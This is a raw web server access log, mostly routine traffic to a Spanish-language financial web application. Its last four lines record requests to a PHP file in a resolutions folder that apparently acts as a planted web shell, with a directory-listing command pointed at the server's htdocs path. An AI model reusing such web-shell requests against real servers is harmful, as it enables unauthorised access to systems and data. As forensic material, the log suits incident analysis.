201.245.192.253 - - [29/Mar/2024:22:39:18 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39976
186.29.217.245 - - [29/Mar/2024:22:39:19 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
186.29.217.245 - - [29/Mar/2024:22:39:19 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarHistorialSolProceso.xhtml HTTP/1.1" 200 42091
186.29.217.245 - - [29/Mar/2024:22:39:20 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.217.245 - - [29/Mar/2024:22:39:20 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.29.217.245 - - [29/Mar/2024:22:39:20 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.217.245 - - [29/Mar/2024:22:39:20 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.217.245 - - [29/Mar/2024:22:39:20 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.217.245 - - [29/Mar/2024:22:39:20 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.217.245 - - [29/Mar/2024:22:39:20 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [29/Mar/2024:22:39:20 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39521
186.29.217.245 - - [29/Mar/2024:22:39:20 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
186.29.217.245 - - [29/Mar/2024:22:39:24 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12853
47.128.27.103 - - [29/Mar/2024:22:39:26 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=ls&d=E%3A%5Cnuevo%5Chtdocs%5Ccalculadora2%5C&sort=1a HTTP/1.1" 200 3923
47.128.27.103 - - [29/Mar/2024:22:39:27 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.27.103 - - [29/Mar/2024:22:39:27 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_php HTTP/1.1" 200 79
47.128.27.103 - - [29/Mar/2024:22:39:27 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_js HTTP/1.1" 200 131
